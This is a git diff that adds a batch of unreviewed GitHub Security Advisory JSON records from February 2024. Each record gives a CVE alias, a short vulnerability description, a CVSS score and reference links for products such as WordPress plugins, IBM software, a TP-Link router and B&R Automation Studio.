@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q524-mh68-7m66", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51666" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Related Post allows Stored XSS.This issue affects Related Post: from n/a through 2.0.53.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51666" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/related-post/wordpress-related-post-plugin-2-0-53-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q54q-m468-q77v/GHSA-q54q-m468-q77v.json b/advisories/unreviewed/2024/02/GHSA-q54q-m468-q77v/GHSA-q54q-m468-q77v.json new file mode 100644 index 0000000000000..66cb10c5fbee5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q54q-m468-q77v/GHSA-q54q-m468-q77v.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q54q-m468-q77v", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-6635" + ], + "details": "The EditorsKit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation on the 'import_styles' function in versions up to, and including, 1.40.3. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6635" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/block-options/tags/1.40.3/includes/addons/styles-manager/rest-api/gutenberghub-styles-import-export-controller.php#L100" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3010794/block-options" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4528f9a1-7027-4aa9-b006-bea84aa19c84?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json b/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json new file mode 100644 index 0000000000000..60a8abdb48faf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5wf-j98c-fr46", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2023-32330" + ], + "details": "IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server. IBM X-Force ID: 254977.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32330" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254977" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q658-fh2m-cgvf/GHSA-q658-fh2m-cgvf.json b/advisories/unreviewed/2024/02/GHSA-q658-fh2m-cgvf/GHSA-q658-fh2m-cgvf.json new file mode 100644 index 0000000000000..5fdd0ae605a94 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q658-fh2m-cgvf/GHSA-q658-fh2m-cgvf.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q658-fh2m-cgvf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0366" + ], + "details": "The Starbox – the Author Box for Humans plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.4.7 via the action function due to missing validation on a user controlled key. This makes it possible for subscribers to view plugin preferences and potentially other user settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0366" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q7wc-c2ff-q9xq/GHSA-q7wc-c2ff-q9xq.json b/advisories/unreviewed/2024/02/GHSA-q7wc-c2ff-q9xq/GHSA-q7wc-c2ff-q9xq.json new file mode 100644 index 0000000000000..60c21a5c60c71 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q7wc-c2ff-q9xq/GHSA-q7wc-c2ff-q9xq.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7wc-c2ff-q9xq", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-06T18:30:20Z", + "aliases": [ + "CVE-2023-46183" + ], + "details": "IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could allow a system administrator to obtain sensitive partition information. IBM X-Force ID: 269695.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46183" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/269695" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7114982" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q7xm-vq7m-w9hh/GHSA-q7xm-vq7m-w9hh.json b/advisories/unreviewed/2024/02/GHSA-q7xm-vq7m-w9hh/GHSA-q7xm-vq7m-w9hh.json new file mode 100644 index 0000000000000..bd85941602e11 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q7xm-vq7m-w9hh/GHSA-q7xm-vq7m-w9hh.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7xm-vq7m-w9hh", + "modified": "2024-02-02T00:31:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2023-49115" + ], + "details": "\n\n\n\n\n\n\nMachineSense devices use unauthenticated MQTT messaging to monitor devices and remote viewing of sensor data by users.\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49115" + }, + { + "type": "WEB", + "url": "https://machinesense.com/pages/about-machinesense" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q9h2-7m5w-75p4/GHSA-q9h2-7m5w-75p4.json b/advisories/unreviewed/2024/02/GHSA-q9h2-7m5w-75p4/GHSA-q9h2-7m5w-75p4.json new file mode 100644 index 0000000000000..854c361f1d04d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q9h2-7m5w-75p4/GHSA-q9h2-7m5w-75p4.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q9h2-7m5w-75p4", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-47564" + ], + "details": "An incorrect permission assignment for critical resource vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow authenticated users to read or modify the resource via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQsync Central 4.4.0.15 ( 2024/01/04 ) and later\nQsync Central 4.3.0.11 ( 2024/01/11 ) and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47564" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json b/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json new file mode 100644 index 0000000000000..7a9088ebb8631 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc2v-frq4-w9pj", + "modified": "2024-02-02T09:30:19Z", + "published": "2024-02-02T09:30:19Z", + "aliases": [ + "CVE-2020-24681" + ], + "details": "Incorrect Permission Assignment for Critical Resource vulnerability in B&R Industrial Automation Automation Studio allows Privilege Escalation.This issue affects Automation Studio: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7 SP, from 4.8.0 before 4.8.6 SP, from 4.9.0 before 4.9.4 SP.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24681" + }, + { + "type": "WEB", + "url": "https://www.br-automation.com/fileadmin/2021-14-BR-AS-NET-PVI-Service-Issues-c3710fbf.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qcjv-87c8-h68q/GHSA-qcjv-87c8-h68q.json b/advisories/unreviewed/2024/02/GHSA-qcjv-87c8-h68q/GHSA-qcjv-87c8-h68q.json new file mode 100644 index 0000000000000..e46329b95c28d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qcjv-87c8-h68q/GHSA-qcjv-87c8-h68q.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcjv-87c8-h68q", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2024-23895" + ], + "details": "A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationcreate.php, in the locationid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23895" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qcm3-g6g8-5572/GHSA-qcm3-g6g8-5572.json b/advisories/unreviewed/2024/02/GHSA-qcm3-g6g8-5572/GHSA-qcm3-g6g8-5572.json new file mode 100644 index 0000000000000..8c507f37a0eff --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qcm3-g6g8-5572/GHSA-qcm3-g6g8-5572.json 
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qcm3-g6g8-5572",
+ "modified": "2024-02-03T00:31:34Z",
+ "published": "2024-02-03T00:31:34Z",
+ "aliases": [
+ "CVE-2024-1196"
+ ],
+ "details": "A vulnerability classified as problematic was found in SourceCodester Testimonial Page Manager 1.0. This vulnerability affects unknown code of the file add-testimonial.php of the component HTTP POST Request Handler. The manipulation of the argument name/description/testimony leads to cross site scripting. The attack can be initiated remotely. VDB-252694 is the identifier assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1196"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252694"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252694"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T22:15:25Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qfhm-jrhg-gr45/GHSA-qfhm-jrhg-gr45.json b/advisories/unreviewed/2024/02/GHSA-qfhm-jrhg-gr45/GHSA-qfhm-jrhg-gr45.json
new file mode 100644
index 0000000000000..2a1118bba43d6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qfhm-jrhg-gr45/GHSA-qfhm-jrhg-gr45.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qfhm-jrhg-gr45",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2024-22108"
+ ],
+ "details": "An issue was discovered in GTB Central Console 15.17.1-30814.NG. The method setTermsHashAction at /opt/webapp/lib/PureApi/CCApi.class.php is vulnerable to an unauthenticated SQL injection via /ccapi.php that an attacker can abuse in order to change the Administrator password to a known value.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22108"
+ },
+ {
+ "type": "WEB",
+ "url": "https://adepts.of0x.cc/gtbcc-pwned/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://x-c3ll.github.io/cves.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json b/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json
new file mode 100644
index 0000000000000..8e7c9c4298aff
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qfm6-2jf8-7v9r",
+ "modified": "2024-02-07T12:30:26Z",
+ "published": "2024-02-07T12:30:26Z",
+ "aliases": [
+ "CVE-2024-1109"
+ ],
+ "details": "The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the init_download() and init() functions in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to export the plugin's tracking data and podcast information.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1109"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/podlove/podlove-publisher/commit/0ac83d1955aa964a358833b1b5ce790fff45b3f4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T11:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qgx2-jx39-h26j/GHSA-qgx2-jx39-h26j.json b/advisories/unreviewed/2024/02/GHSA-qgx2-jx39-h26j/GHSA-qgx2-jx39-h26j.json
new file mode 100644
index 0000000000000..8d15cabc9dcb0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qgx2-jx39-h26j/GHSA-qgx2-jx39-h26j.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qgx2-jx39-h26j",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0835"
+ ],
+ "details": "The Royal Elementor Kit theme for WordPress is vulnerable to unauthorized arbitrary transient update due to a missing capability check on the dismissed_handler function in all versions up to, and including, 1.0.116. This makes it possible for authenticated attackers, with subscriber access or higher, to update arbitrary transients. Note, that these transients can only be updated to true and not arbitrary values.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0835"
+ },
+ {
+ "type": "WEB",
+ "url": "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://wordpress.org/themes/royal-elementor-kit/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qh6x-9qph-mmv5/GHSA-qh6x-9qph-mmv5.json b/advisories/unreviewed/2024/02/GHSA-qh6x-9qph-mmv5/GHSA-qh6x-9qph-mmv5.json
new file mode 100644
index 0000000000000..f9987cf7f699d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qh6x-9qph-mmv5/GHSA-qh6x-9qph-mmv5.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qh6x-9qph-mmv5",
+ "modified": "2024-02-02T18:30:30Z",
+ "published": "2024-02-02T00:31:27Z",
+ "aliases": [
+ "CVE-2024-22927"
+ ],
+ "details": "Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22927"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/weng-xianhu/eyoucms/issues/57"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qmjp-x43g-wwmh/GHSA-qmjp-x43g-wwmh.json b/advisories/unreviewed/2024/02/GHSA-qmjp-x43g-wwmh/GHSA-qmjp-x43g-wwmh.json
new file mode 100644
index 0000000000000..a7260adc16e7f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qmjp-x43g-wwmh/GHSA-qmjp-x43g-wwmh.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qmjp-x43g-wwmh",
+ "modified": "2024-02-03T03:30:27Z",
+ "published": "2024-02-01T15:30:24Z",
+ "aliases": [
+ "CVE-2024-24060"
+ ],
+ "details": "springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sys/user.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24060"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#11-stored-cross-site-scripting-sysuser"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T14:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json b/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json
new file mode 100644
index 0000000000000..9ffe90e7de202
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qp5h-6h76-j5w8",
+ "modified": "2024-02-02T09:30:19Z",
+ "published": "2024-02-02T09:30:19Z",
+ "aliases": [
+ "CVE-2021-22282"
+ ],
+ "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in B&R Industrial Automation Automation Studio allows Local Execution of Code.This issue affects Automation Studio: from 4.0 through 4.12.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22282"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.br-automation.com/fileadmin/2021-12_RCE_Vulnerability_in_BnR_Automation_Studio-1b993aeb.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T07:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qphc-8455-gj55/GHSA-qphc-8455-gj55.json b/advisories/unreviewed/2024/02/GHSA-qphc-8455-gj55/GHSA-qphc-8455-gj55.json
new file mode 100644
index 0000000000000..9f0b4a842f79f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qphc-8455-gj55/GHSA-qphc-8455-gj55.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qphc-8455-gj55",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2023-47209"
+ ],
+ "details": "A post authentication command injection vulnerability exists in the ipsec policy functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47209"
+ },
+ {
+ "type": "WEB",
+ "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1854"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qrmv-p28h-q98v/GHSA-qrmv-p28h-q98v.json b/advisories/unreviewed/2024/02/GHSA-qrmv-p28h-q98v/GHSA-qrmv-p28h-q98v.json
new file mode 100644
index 0000000000000..e860048aca7aa
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qrmv-p28h-q98v/GHSA-qrmv-p28h-q98v.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qrmv-p28h-q98v",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0961"
+ ],
+ "details": "The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the code editor in all versions up to, and including, 1.58.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0961"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:06Z"
+ }
+}
\ No newline at end of file
